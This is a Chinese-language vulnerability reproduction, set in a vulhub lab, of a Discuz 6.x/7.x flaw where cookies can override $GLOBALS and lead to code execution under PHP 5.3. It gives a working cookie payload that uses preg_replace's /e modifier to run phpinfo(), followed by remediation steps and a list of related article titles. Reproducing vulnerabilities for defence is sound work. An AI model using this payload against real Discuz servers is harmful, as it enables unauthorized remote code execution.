Discuz 6、7 版本存在全域性變數防禦繞過導致程式碼執行漏洞
Discuz 6、7 版本存在全域性變數防禦繞過導致程式碼執行漏洞
影響版本:6.x、7.x
產生原因:由於php5.3.x版本里php.ini的設定裡request_order
預設值為GP,導致$_REQUEST
中不再包含$_COOKIE
,我們通過在Cookie中傳入$GLOBALS
來覆蓋全域性變數,造成程式碼執行漏洞。
前置條件: php5.3、php5.6
使用vulhub靶場復現此漏洞
構建環境
docker-compose up -d
訪問
http://yourip:8080/
訪問以下路徑,進行安裝
http://yourip:8080/install
資料服務庫伺服器:db,使用者名稱root,密碼root
安裝成功,進入discuz首頁,如圖:
進入預設模組如下圖:
進入任何一個帖子,抓取資料包,在cookie中構造pyload
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
如下圖:
結果成功執行了命令,返回了php環境資訊,如下圖:
漏洞修復
1、修改php.ini配置引數 request_order = “CGP”
2、升級discuz版本
相關文章
- Discuz! X系列遠端程式碼執行漏洞分析
- Windows漏洞:MS08-067遠端程式碼執行漏洞復現及深度防禦Windows
- python多執行緒-共享全域性變數Python執行緒變數
- WordPress File Manager 存在任意程式碼執行漏洞,騰訊T-Sec Web應用防火牆已支援防禦Web防火牆
- Webscan360的防禦與繞過Web
- 微軟審查發現Perforce Helix Core Server存在四個漏洞,可導致遠端程式碼執行微軟Server
- 眾至科技:漏洞通告 | 微軟10月釋出多個安全漏洞;Apache Shiro許可權繞過漏洞;Apache Commons存在程式碼執行漏洞微軟Apache
- Jmeter-全域性變數跨執行緒組使用JMeter變數執行緒
- Acer和華碩電腦漏洞曝光,可導致任意程式碼執行
- 嚴重 PHP 漏洞導致伺服器遭受遠端程式碼執行PHP伺服器
- xss原理繞過防禦個人總結
- 追求程式碼質量: 用 AOP 進行防禦性程式設計程式設計
- 新的PHP高危漏洞可導致黑客執行遠端程式碼攻擊PHP黑客
- 多執行緒中,區域性變數與全域性變數哪個比較安全?執行緒變數
- 全域性變數變數
- 用友-NC-Cloud存在控制檯繞過漏洞Cloud
- VMwareMac版本漏洞可任意執行惡意程式碼REMMac
- 網站漏洞檢測 squid反向代理存在遠端程式碼執行漏洞網站UI
- 全域性變數與區域性變數變數
- 區域性變數和全域性變數變數
- 【檔案上傳繞過】路徑拼接問題導致上傳漏洞
- 全域性 DOM 變數變數
- 記一次,因表變數導致SQL執行效率變慢變數SQL
- Java區域性變數與全域性變數Java變數
- java 全域性變數和區域性變數Java變數
- jmeter全域性變數和區域性變數JMeter變數
- 【c】全域性變數與區域性變數變數
- vue定義全域性變數和全域性方法Vue變數
- Apache Solr應用伺服器存在遠端程式碼執行漏洞?ApacheSolr伺服器
- 如何做好“防禦性編碼”?
- 學Guava發現:不可變特性與防禦性程式設計Guava程式設計
- js宣告全域性變數JS變數
- 利用CMSTP繞過AppLocker並執行程式碼APP行程
- Jmeter將token設定為全域性變數並跨執行緒進行傳遞引數JMeter變數執行緒
- MySQL連線數過多導致服務無法正常執行MySql
- PHP 近期被爆存在遠端程式碼執行漏洞 CVE-2019-11043PHP
- Python中的全域性變數和區域性變數Python變數
- JavaScript五:全域性變數&區域性變數;運算子JavaScript變數